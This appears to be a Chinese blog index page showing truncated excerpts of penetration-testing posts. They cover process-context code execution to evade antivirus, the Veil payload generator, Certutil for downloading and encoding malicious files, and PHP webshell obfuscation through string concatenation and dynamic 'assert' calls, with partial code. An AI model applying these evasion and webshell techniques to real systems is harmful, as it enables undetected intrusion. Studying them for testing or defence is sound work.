墨痕诉清风的博客

众所周知，常用的C2工具（例如CobaltStrike）在另一个进程上下文中执行代码经常使用的就是inject和shinject命令，这两个命令可以将代码注入到任意远程进程中。但是进程注入方案现在已经被杀软监测得死死的，尤其是某数字公司，只有在当前进程上下文中进行注入才不会被杀。那么除了进程注入外我们是否还有其他方案能在其他进程上下文中执行代码呢？在介绍新工具前，我先讲一下大致的原理，核心就是利用了Windows Session。

Veil是一款利用Metasploit框架生成相兼容的Payload工具，并且在大多数网络环境中能绕过常见的杀毒软件。

目录Certutil环境编码解码散列下载系统错误代码使用Certutil进行渗透测试提交恶意可执行文件提交恶意 DLL 编码（免杀）有效载荷可以被编码或加密，以避免被检测（免杀）。Certutil 是 Windows 操作系统上预装的工具，可用于 校验文件MD5、SHA1、SHA256，下载恶意文件和免杀。本文仅供学习使用，请勿用于非法操作，后果与作者无关。下面，将介绍它在 Windows 渗透测试中的作用。CertutilCertutil

目录免杀小技巧1.字符串拼接方式，构造敏感函数。2.通过PHP的动态函数方法执行一句话。3.利用php异或^构造字符串免杀木马构造一句话测试异或转码数据小结免杀小技巧1.字符串拼接方式，构造敏感函数。<?php$a = 'ass';$b = 'er';$c = 't';$d = $a.$b.$c; //assert2.通过PHP的动态函数方法执行一句话。<?php$a = 'assert';$b = '_GET';$a(.

空